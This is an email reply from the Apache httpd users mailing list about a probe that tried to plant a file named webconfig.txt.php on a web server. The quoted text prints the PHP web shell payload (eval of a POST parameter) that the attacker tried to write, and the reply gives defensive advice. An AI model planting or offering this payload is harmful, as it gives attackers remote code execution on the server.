On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:
<?php eval($_POST[1]);?>
I didn't decode the remaining lines. I think they're just trying to do the same
thing.
Fortunately there is no webconfig.txt.php. And all folders in /srv/www belongs to root and user wwwrun
is not allowed to write there.
What seems to be happening here is that your system is being probed for vulnerabilities.
The attacker is sending a payload string to your index.php file in hopes that it will not complain and write the string to the file webconfig.txt.php which the attacker would then attempt to get to with the real hack in the Posted contents. Are there any requests to get to that file?
You should make sure you sanitized any input to your index.php and reject anything that's not expected.
Ken
------------------------------------------------------------ ---------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx